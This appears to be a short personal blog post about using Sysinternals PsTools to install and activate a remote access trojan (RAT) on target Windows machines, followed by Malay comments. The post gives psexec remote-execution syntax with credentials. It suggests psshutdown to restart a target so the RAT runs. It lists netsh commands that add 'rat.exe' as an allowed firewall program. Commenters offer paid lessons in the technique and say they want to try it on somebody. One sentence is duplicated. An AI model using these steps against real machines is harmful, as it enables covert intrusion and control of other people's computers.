I'm been playing with this pstools. What is pstools? A set of command-line tools that allow you to manage remote systems as well as the local one. Huh.. sounds interesting.. :)
Tested several commands in my vm environment, wrote a little script to install a RAT remotely.
Tested several commands in my vm environment, wrote a little script to install a RAT remotely.
Pslist in action. Listing all my active process on my machine.
Well if your target machine is running windows xp sp2 with firewall enabled, you can use this command combined with psexec. Just expand your imaginations.
Some basic command in using psexec are:
psexec \\computer_ip -u username -p password "program_path" command
To shutdown a machine remotely, you can use psshutdown.
Why do we need to shutdown a remote host? well sometime if we installed a RAT, it needs to be restarted first before we can put it in action.
netsh firewall
show config >> conf.txt
add allowed program = C:\WINDOWS\RAT\rat.exe name = rat32 mode = ENABLE
6 comments:
aduh
berpinau2 kepala akak baca nih
ntah paham ntah tidak
angguk2 geleng2 jer lah
sy leh buat kursus intensif khas untuk gunakan teknik ni.. upahnya mcm biasa la.. kehepsi.. hihihi
nak gak tool tu...
nak try kat somebody.....he..he..he...
boleh.. tapi ada la pengerasnya.. hihihi.. kfc jangan lupa.. hihihi
leh download kat internet la, download url dia kat sini :
http://download.sysinternals.com/Files/PsTools.zip
aku dah test..tp masih study...
test jangan tak test